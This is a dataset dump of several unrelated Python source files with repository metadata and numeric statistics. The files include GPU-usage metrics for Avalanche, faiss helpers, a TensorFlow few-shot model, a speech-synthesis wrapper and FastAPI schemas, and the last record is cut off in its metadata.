        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 42.263158 | 86 | 0.71565 | 264 | 2,409 | 6.329545 | 0.246212 | 0.09216 | 0.041891 | 0.065829 | 0.576302 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0 | 0.012214 | 0.184309 | 2,409 | 56 | 87 | 43.017857 | 0.838168 | 0 | 0 | 0.468085 | 0 | 0 | 0.094645 | 0.060191 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.12766 | false | 0.085106 | 0.12766 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6f8edf6b803563f114318f388210647b9924420a | 11,263 | py | Python | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-08-11T19:43:38.000Z | 2021-08-11T19:43:38.000Z | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-04-09T08:10:27.000Z | 2021-04-09T08:10:27.000Z | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric
from avalanche.evaluation.metric_results import MetricValue, MetricResult
from avalanche.evaluation.metric_utils import get_metric_name, \
    phase_and_task, stream_type

if TYPE_CHECKING:
    from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
    """
    The standalone GPU usage metric.
    Important: this metric approximates the real maximum GPU percentage
    usage since it samples the GPU values at discrete time intervals.
    Instances of this metric keep the maximum GPU usage percentage detected.
    The `start_thread` method starts the usage tracking.
    The `stop_thread` method stops the tracking.
    The result, obtained using the `result` method, is the maximum usage
    percentage detected.
    The reset method will bring the metric to its initial state. By default
    this metric in its initial state will return a usage value of 0.
    """

    def __init__(self, gpu_id, every=0.5):
        """
        Creates an instance of the GPU usage metric.
        :param gpu_id: GPU device ID.
        :param every: seconds after which the maximum GPU usage is updated.
        """
        self.every = every
        self.gpu_id = gpu_id

        n_gpus = len(GPUtil.getGPUs())
        if n_gpus == 0:
            warnings.warn("Your system has no GPU!")
            self.gpu_id = None
        elif gpu_id < 0:
            warnings.warn("GPU metric called with negative GPU id. "
                          "GPU logging disabled")
            self.gpu_id = None
        else:
            if gpu_id >= n_gpus:
                warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
                self.gpu_id = 0

        self.thread = None
        """
        Thread executing GPU monitoring code
        """

        self.stop_f = False
        """
        Flag to stop the thread
        """

        self.max_usage = 0
        """
        Main metric result. Max GPU usage.
        """

    def _f(self):
        """
        Until a stop signal is encountered,
        this function monitors, every `every` seconds,
        the maximum amount of GPU used by the process.
        """
        start_time = time.monotonic()
        while not self.stop_f:
            # GPU usage percentage
            gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
            if gpu_perc > self.max_usage:
                self.max_usage = gpu_perc
            time.sleep(self.every - ((time.monotonic() - start_time)
                                     % self.every))

    def start_thread(self):
        # `gpu_id` may legitimately be 0, so compare against None explicitly
        if self.gpu_id is not None:
            assert not self.thread, "Trying to start thread " \
                                    "without joining the previous."
            self.thread = Thread(target=self._f, daemon=True)
            self.thread.start()

    def stop_thread(self):
        if self.thread:
            self.stop_f = True
            self.thread.join()
            self.stop_f = False
            self.thread = None

    def reset(self) -> None:
        """
        Resets the metric.
        :return: None.
        """
        self.max_usage = 0

    def result(self) -> Optional[float]:
        """
        Returns the max GPU percentage value.
        :return: The percentage GPU usage as a float value in range [0, 100].
        """
        return self.max_usage
class MinibatchMaxGPU(PluginMetric[float]):
    """
    The Minibatch Max GPU metric.
    This plugin metric only works at training time.
    """

    def __init__(self, gpu_id, every=0.5):
        """
        Creates an instance of the Minibatch Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds after which the maximum GPU usage is updated.
        """
        super().__init__()
        self.gpu_id = gpu_id
        self._gpu = MaxGPU(gpu_id, every)

    def before_training(self, strategy: 'BaseStrategy') \
            -> None:
        self._gpu.start_thread()

    def before_training_iteration(self, strategy: 'BaseStrategy') -> None:
        self.reset()

    def after_training_iteration(self, strategy: 'BaseStrategy') \
            -> MetricResult:
        return self._package_result(strategy)

    def after_training(self, strategy: 'BaseStrategy') -> None:
        self._gpu.stop_thread()

    def reset(self) -> None:
        self._gpu.reset()

    def result(self) -> float:
        return self._gpu.result()

    def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
        gpu_usage = self.result()
        metric_name = get_metric_name(self, strategy)
        plot_x_position = self.get_global_counter()
        return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]

    def __str__(self):
        return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(PluginMetric[float]):
    """
    The Epoch Max GPU metric.
    This plugin metric only works at training time.
    """

    def __init__(self, gpu_id, every=0.5):
        """
        Creates an instance of the epoch Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds after which the maximum GPU usage is updated.
        """
        super().__init__()
        self.gpu_id = gpu_id
        self._gpu = MaxGPU(gpu_id, every)

    def before_training(self, strategy: 'BaseStrategy') \
            -> None:
        self._gpu.start_thread()

    def before_training_epoch(self, strategy) -> MetricResult:
        self.reset()

    def after_training_epoch(self, strategy: 'BaseStrategy') \
            -> MetricResult:
        return self._package_result(strategy)

    def after_training(self, strategy: 'BaseStrategy') -> None:
        self._gpu.stop_thread()

    def reset(self) -> None:
        self._gpu.reset()

    def result(self) -> float:
        return self._gpu.result()

    def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
        gpu_usage = self.result()
        metric_name = get_metric_name(self, strategy)
        plot_x_position = self.get_global_counter()
        return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]

    def __str__(self):
        return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(PluginMetric[float]):
    """
    The Experience Max GPU metric.
    This plugin metric only works at eval time.
    """

    def __init__(self, gpu_id, every=0.5):
        """
        Creates an instance of the Experience Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds after which the maximum GPU usage is updated.
        """
        super().__init__()
        self.gpu_id = gpu_id
        self._gpu = MaxGPU(gpu_id, every)

    def before_eval(self, strategy: 'BaseStrategy') \
            -> None:
        self._gpu.start_thread()

    def before_eval_exp(self, strategy) -> MetricResult:
        self.reset()

    def after_eval_exp(self, strategy: 'BaseStrategy') \
            -> MetricResult:
        return self._package_result(strategy)

    def after_eval(self, strategy: 'BaseStrategy') -> None:
        self._gpu.stop_thread()

    def reset(self) -> None:
        self._gpu.reset()

    def result(self) -> float:
        return self._gpu.result()

    def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
        gpu_usage = self.result()
        metric_name = get_metric_name(self, strategy, add_experience=True)
        plot_x_position = self.get_global_counter()
        return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]

    def __str__(self):
        return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(PluginMetric[float]):
    """
    The Stream Max GPU metric.
    This plugin metric only works at eval time.
    """

    def __init__(self, gpu_id, every=0.5):
        """
        Creates an instance of the Stream Max GPU metric.
        :param gpu_id: GPU device ID.
        :param every: seconds after which the maximum GPU usage is updated.
        """
        super().__init__()
        self.gpu_id = gpu_id
        self._gpu = MaxGPU(gpu_id, every)

    def before_eval(self, strategy) -> MetricResult:
        self.reset()
        self._gpu.start_thread()

    def after_eval(self, strategy: 'BaseStrategy') \
            -> MetricResult:
        packed = self._package_result(strategy)
        self._gpu.stop_thread()
        return packed

    def reset(self) -> None:
        self._gpu.reset()

    def result(self) -> float:
        return self._gpu.result()

    def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
        gpu_usage = self.result()
        phase_name, _ = phase_and_task(strategy)
        stream = stream_type(strategy.experience)
        metric_name = '{}/{}_phase/{}_stream' \
            .format(str(self),
                    phase_name,
                    stream)
        plot_x_position = self.get_global_counter()
        return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]

    def __str__(self):
        return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(gpu_id, every=0.5, minibatch=False, epoch=False,
                      experience=False, stream=False) -> List[PluginMetric]:
    """
    Helper method that can be used to obtain the desired set of
    plugin metrics.
    :param gpu_id: GPU device ID.
    :param every: seconds after which the maximum GPU usage is updated.
    :param minibatch: If True, will return a metric able to log the minibatch
        max GPU usage.
    :param epoch: If True, will return a metric able to log the epoch
        max GPU usage.
    :param experience: If True, will return a metric able to log the experience
        max GPU usage.
    :param stream: If True, will return a metric able to log the evaluation
        max stream GPU usage.
    :return: A list of plugin metrics.
    """
    metrics = []
    if minibatch:
        metrics.append(MinibatchMaxGPU(gpu_id, every))
    if epoch:
        metrics.append(EpochMaxGPU(gpu_id, every))
    if experience:
        metrics.append(ExperienceMaxGPU(gpu_id, every))
    if stream:
        metrics.append(StreamMaxGPU(gpu_id, every))
    return metrics


__all__ = [
    'MaxGPU',
    'MinibatchMaxGPU',
    'EpochMaxGPU',
    'ExperienceMaxGPU',
    'StreamMaxGPU',
    'gpu_usage_metrics'
]
| 29.717678 | 80 | 0.589097 | 1,310 | 11,263 | 4.868702 | 0.166412 | 0.03371 | 0.026811 | 0.018344 | 0.520853 | 0.492945 | 0.4873 | 0.473816 | 0.473816 | 0.473816 | 0 | 0.004622 | 0.308444 | 11,263 | 378 | 81 | 29.796296 | 0.814225 | 0.27435 | 0 | 0.502762 | 0 | 0 | 0.078166 | 0.019713 | 0 | 0 | 0 | 0 | 0.005525 | 1 | 0.226519 | false | 0 | 0.049724 | 0.060773 | 0.403315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
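The `MaxGPU` pattern above — a daemon thread keeping the running maximum of a periodically sampled reading — can be exercised without a GPU by stubbing the reader; here `read_fn` stands in for `GPUtil.getGPUs()[i].load`:

```python
import itertools
import threading
import time


class MaxSampler:
    """Keep the maximum of a sampled quantity on a background thread
    (same start/stop shape as MaxGPU above, with the reader injected)."""

    def __init__(self, read_fn, every=0.005):
        self.read_fn = read_fn
        self.every = every
        self.max_value = float('-inf')
        self._stop = False
        self._thread = None

    def _loop(self):
        while not self._stop:
            self.max_value = max(self.max_value, self.read_fn())
            time.sleep(self.every)

    def start_thread(self):
        self._thread = threading.Thread(target=self._loop, daemon=True)
        self._thread.start()

    def stop_thread(self):
        self._stop = True
        self._thread.join()


# Stub reader cycling through fake utilization values
readings = itertools.cycle([10.0, 50.0, 30.0])
sampler = MaxSampler(lambda: next(readings))
sampler.start_thread()
time.sleep(0.3)  # sample for a while; the 3-value cycle repeats many times
sampler.stop_thread()
```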
6f93e22cf26c9a478c3691514ddab933b92e050e | 280 | py | Python | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | import numpy as np
import pickle
expert_file = 'maze_expert.npy'
imitation_agent_file = 'maze_agent.npy'
with open(imitation_agent_file, 'rb') as handle:
    agent_data = pickle.load(handle)
with open(expert_file, 'rb') as handle:
    expert_data = pickle.load(handle)
print("OK") | 31.111111 | 48 | 0.757143 | 44 | 280 | 4.590909 | 0.431818 | 0.09901 | 0.178218 | 0.138614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 280 | 9 | 49 | 31.111111 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0.124555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
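Despite the `.npy` extensions, the script above reads its files with `pickle`, not `numpy.load`; a minimal round-trip of that pattern on a throwaway file (the payload below is made up):

```python
import os
import pickle
import tempfile

data = {'observations': [0, 1, 2], 'actions': [1, 0, 1]}
path = os.path.join(tempfile.mkdtemp(), 'maze_agent.npy')  # pickled data, .npy name
with open(path, 'wb') as handle:
    pickle.dump(data, handle)
with open(path, 'rb') as handle:
    loaded = pickle.load(handle)
```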
6f9d6fb07fd37fbb906d2b22ed6f41821f271822 | 198 | py | Python | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | ishashad.py | albusdemens/Twitter-mining-project | 67a2bd651459568bb74d64dde9cd76fc7925fd32 | [
"MIT"
] | null | null | null | #To run the code, write
#from ishashad import ishashad
#then ishashad(number)
def ishashad(n):
    # Harshad (Niven) number: divisible by the sum of its digits
    if n % sum(map(int, str(n))) == 0:
        print("True")
    else:
        print("False")
    return
 | 18 | 37 | 0.60101 | 29 | 198 | 4.103448 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.252525 | 198 | 11 | 38 | 18 | 0.797297 | 0.363636 | 0 | 0 | 0 | 0 | 0.072581 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fa203b91e4061ab9a5aeb13af78a9c24d505f2c | 785 | py | Python | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 22 | 2019-01-13T12:56:56.000Z | 2020-11-03T01:39:20.000Z | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | null | null | null | faiss_utils.py | yizt/keras-lbl-IvS | 3f98b698c56ae40954b4920da167f7c9e32024c8 | [
"Apache-2.0"
] | 5 | 2019-04-01T09:19:55.000Z | 2020-05-26T14:38:06.000Z | # -*- coding: utf-8 -*-
"""
   File Name:    faiss_utils
   Description : faiss utility helpers
   Author :      mick.yi
   date:         2019/1/4
"""
import faiss
import numpy as np


def get_index(dimension):
    sub_index = faiss.IndexFlatL2(dimension)
    index = faiss.IndexIDMap(sub_index)
    return index


def update_multi(index, vectors, ids):
    """
    :param index:
    :param vectors:
    :param ids:
    :return:
    Note: ValueError: array is not C-contiguous
    """
    idx = np.argsort(ids)
    # Remove the ids first, then add them back
    index.remove_ids(ids[idx])
    index.add_with_ids(vectors[idx], ids[idx])


def update_one(index, vector, label_id):
    vectors = np.expand_dims(vector, axis=0)
    ids = np.array([label_id])
    update_multi(index, vectors, ids)
| 21.216216 | 47 | 0.602548 | 100 | 785 | 4.6 | 0.54 | 0.034783 | 0.069565 | 0.1 | 0.113043 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.277707 | 785 | 36 | 48 | 21.805556 | 0.795414 | 0.280255 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
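`faiss.IndexFlatL2` ranks stored vectors by squared L2 distance; a dependency-free sketch of that ranking, handy for spot-checking results when faiss is not installed:

```python
def l2_search(xb, xq, k):
    # Brute-force squared-L2 ranking over database vectors xb,
    # returning the indices of the k nearest for each query in xq
    results = []
    for q in xq:
        scored = [(sum((a - b) ** 2 for a, b in zip(q, v)), i)
                  for i, v in enumerate(xb)]
        scored.sort()
        results.append([i for _, i in scored[:k]])
    return results
```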
6fa21afd208bf7323dcf7c8f05508069120736b0 | 475 | py | Python | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 1 | 2021-05-29T23:43:36.000Z | 2021-05-29T23:43:36.000Z | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | null | null | null | relogio.py | Glightman/project_jogo_POO | c5557871f7e4a2a264c03180581cb2a6b1dec1b9 | [
"MIT"
] | 2 | 2021-06-01T01:36:01.000Z | 2021-06-01T01:36:59.000Z | class Relogio:
    def __init__(self):
        self.horas = 6
        self.minutos = 0
        self.dia = 1

    def __str__(self):
        return f"{self.horas:02d}:{self.minutos:02d} do dia {self.dia:02d}"

    def avancaTempo(self, minutos):
        self.minutos += minutos
        while self.minutos >= 60:
            self.minutos -= 60
            self.horas += 1
            if self.horas >= 24:
                self.horas = 0
                self.dia += 1
| 23.75 | 75 | 0.492632 | 57 | 475 | 3.964912 | 0.368421 | 0.292035 | 0.070796 | 0.079646 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062069 | 0.389474 | 475 | 19 | 76 | 25 | 0.717241 | 0 | 0 | 0 | 0 | 0.066667 | 0.120507 | 0.073996 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.066667 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
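The minute→hour→day carry in `avancaTempo` can be checked in isolation; `advance` below is an illustrative standalone version of the same arithmetic:

```python
def advance(horas, minutos, dia, delta):
    # Same carry logic as Relogio.avancaTempo above
    minutos += delta
    while minutos >= 60:
        minutos -= 60
        horas += 1
        if horas >= 24:
            horas = 0
            dia += 1
    return horas, minutos, dia
```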
6fa4cb77b9686bd974f4ba0799278420d18f452c | 1,928 | py | Python | fewshot/models/basic_model_VAT_ENT.py | AhmedAyad89/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 22 | 2019-03-13T02:19:17.000Z | 2021-08-06T03:13:00.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 1 | 2019-07-27T14:33:02.000Z | 2020-06-01T11:03:20.000Z | fewshot/models/basic_model_VAT_ENT.py | mattochal/Consitent-Prototypical-Networks-Semi-Supervised-Few-Shot-Learning | b0b805733ee6c42cee5ddd9eace94edd29f6120d | [
"MIT"
] | 5 | 2019-03-07T06:18:51.000Z | 2019-10-22T05:33:23.000Z | from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

import numpy as np
import tensorflow as tf

from fewshot.models.kmeans_utils import compute_logits
from fewshot.models.model import Model
from fewshot.models.refine_model import RefineModel
from fewshot.models.basic_model_VAT import BasicModelVAT
from fewshot.models.model_factory import RegisterModel
from fewshot.models.nnlib import (concat, weight_variable)
from fewshot.utils import logger
from fewshot.utils.debug import debug_identity
from fewshot.models.SSL_utils import *

l2_norm = lambda t: tf.sqrt(tf.reduce_sum(tf.pow(t, 2)))

log = logger.get()


@RegisterModel("basic-VAT-ENT")
class BasicModelVAT_ENT(BasicModelVAT):
    def get_train_op(self, logits, y_test):
        loss, train_op = BasicModelVAT.get_train_op(self, logits, y_test)
        config = self.config
        ENT_weight = config.ENT_weight
        VAT_ENT_step_size = config.VAT_ENT_step_size

        logits = self._unlabel_logits
        s = tf.shape(logits)
        s = s[0]
        p = tf.stop_gradient(self.h_unlabel)
        affinity_matrix = compute_logits(p, p) - (tf.eye(s, dtype=tf.float32) * 1000.0)
        # logits = tf.Print(logits, [tf.shape(point_logits)])
        ENT_loss = walking_penalty(logits, affinity_matrix)
        loss += ENT_weight * ENT_loss

        ENT_opt = tf.train.AdamOptimizer(VAT_ENT_step_size * self.learn_rate,
                                         name="Entropy-optimizer")
        ENT_grads_and_vars = ENT_opt.compute_gradients(loss)
        train_op = ENT_opt.apply_gradients(ENT_grads_and_vars)

        for gradient, variable in ENT_grads_and_vars:
            if gradient is None:
                gradient = tf.constant(0.0)
            self.adv_summaries.append(tf.summary.scalar("ENT/gradients/" + variable.name, l2_norm(gradient), family="Grads"))
            self.adv_summaries.append(tf.summary.histogram("ENT/gradients/" + variable.name, gradient, family="Grads"))

        self.summaries.append(tf.summary.scalar('entropy loss', ENT_loss))
        return loss, train_op
| 33.824561 | 116 | 0.769191 | 287 | 1,928 | 4.923345 | 0.355401 | 0.070064 | 0.084218 | 0.029724 | 0.104742 | 0.079264 | 0.035386 | 0 | 0 | 0 | 0 | 0.007738 | 0.128631 | 1,928 | 56 | 117 | 34.428571 | 0.833333 | 0.026452 | 0 | 0 | 0 | 0 | 0.042712 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025641 | false | 0 | 0.307692 | 0 | 0.384615 | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6fa85d4b0b5bfa6ac386b4e088bb46a5cbd9b94a | 614 | py | Python | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | compose.py | luyao777/speech-robot | a00c9ac554b7b7a86af4a57d33acb50bbdc17822 | [
"Apache-2.0"
] | null | null | null | #coding: utf-8
from aip import AipSpeech
from config import DefaultConfig as opt


class composer():
    def __init__(self):
        pass

    def compose(self, text='你好'):
        # API credentials obtained from the Baidu developer console
        APP_ID = opt.baidu_app_id
        API_KEY = opt.baidu_api_key
        SECRET_KEY = opt.baidu_secret_key
        client = AipSpeech(APP_ID, API_KEY, SECRET_KEY)
        result = client.synthesis(text, 'zh', 1, {
            'vol': 5, })
        file_name = 'ans.mp3'
        if not isinstance(result, dict):
            with open(file_name, 'wb') as f:
                f.write(result)
        return file_name
| 26.695652 | 55 | 0.583062 | 82 | 614 | 4.146341 | 0.597561 | 0.044118 | 0.047059 | 0.064706 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001629 | 0.009524 | 0.315961 | 614 | 22 | 56 | 27.909091 | 0.797619 | 0.039088 | 0 | 0 | 0 | 0 | 0.027257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.058824 | 0.117647 | 0 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fb000a6fd5b519a73bbb7413dd210206c96960d | 370 | py | Python | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | python/geeksforgeeks/arrays/rearrengment/reverse_a_string.py | othonreyes/code_problems | 6e65b26120b0b9d6e5ac7342a4d964696b7bd5bf | [
"MIT"
] | null | null | null | # https://www.geeksforgeeks.org/write-a-program-to-reverse-an-array-or-string/
# Time: O(n)
# Space: O(1)
def reverseByMiddles(arr):
    n = len(arr)
    limit = n // 2
    for i in range(limit):
        temp = arr[i]
        arr[i] = arr[(n - 1) - i]
        arr[(n - 1) - i] = temp
    return arr


arr = [1, 2, 3]
result = reverseByMiddles(arr)
print(result)
print(reverseByMiddles(arr=[1, 2, 3, 4]))
| 18.5 | 78 | 0.627027 | 64 | 370 | 3.625 | 0.53125 | 0.24569 | 0.060345 | 0.051724 | 0.056034 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036066 | 0.175676 | 370 | 19 | 79 | 19.473684 | 0.72459 | 0.259459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fbe42378fbc286f445856d3f64bebf5d1265f7a | 1,173 | py | Python | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 43 | 2020-12-14T18:19:15.000Z | 2022-03-30T05:57:43.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 3 | 2021-02-19T09:56:35.000Z | 2022-03-30T13:26:50.000Z | app/model.py | hfikry92/fast-api-auth-starter | 4d90980da7084961f8f25591aea587509e790f80 | [
"MIT"
] | 16 | 2020-12-14T02:49:35.000Z | 2022-02-15T10:39:39.000Z | from pydantic import BaseModel, Field, EmailStr
class PostSchema(BaseModel):
    id: int = Field(default=None)
    title: str = Field(...)
    content: str = Field(...)

    class Config:
        schema_extra = {
            "example": {
                "title": "Securing FastAPI applications with JWT.",
                "content": "In this tutorial, you'll learn how to secure your application by enabling authentication using JWT. We'll be using PyJWT to sign, encode and decode JWT tokens...."
            }
        }


class UserSchema(BaseModel):
    fullname: str = Field(...)
    email: EmailStr = Field(...)
    password: str = Field(...)

    class Config:
        schema_extra = {
            "example": {
                "fullname": "Abdulazeez Abdulazeez Adeshina",
                "email": "abdulazeez@x.com",
                "password": "weakpassword"
            }
        }


class UserLoginSchema(BaseModel):
    email: EmailStr = Field(...)
    password: str = Field(...)

    class Config:
        schema_extra = {
            "example": {
                "email": "abdulazeez@x.com",
                "password": "weakpassword"
            }
        }
| 27.27907 | 191 | 0.535379 | 107 | 1,173 | 5.841122 | 0.53271 | 0.064 | 0.0624 | 0.0912 | 0.3856 | 0.3856 | 0.2608 | 0.2016 | 0.2016 | 0.2016 | 0 | 0 | 0.341006 | 1,173 | 42 | 192 | 27.928571 | 0.808538 | 0 | 0 | 0.5 | 0 | 0.029412 | 0.30179 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.117647 | 0.029412 | 0 | 0.441176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6fc63d77d8ed73c401918b676d06084cc00b6c87 | 954 | py | Python | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | 1 | 2022-02-07T15:56:24.000Z | 2022-02-07T15:56:24.000Z | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
] | null | null | null | wind-oci-marketplace/setup.py | LaudateCorpus1/wind | d10dbc6baa98acab4927ff2b7a880b4727185582 | [
"UPL-1.0",
"Apache-2.0"
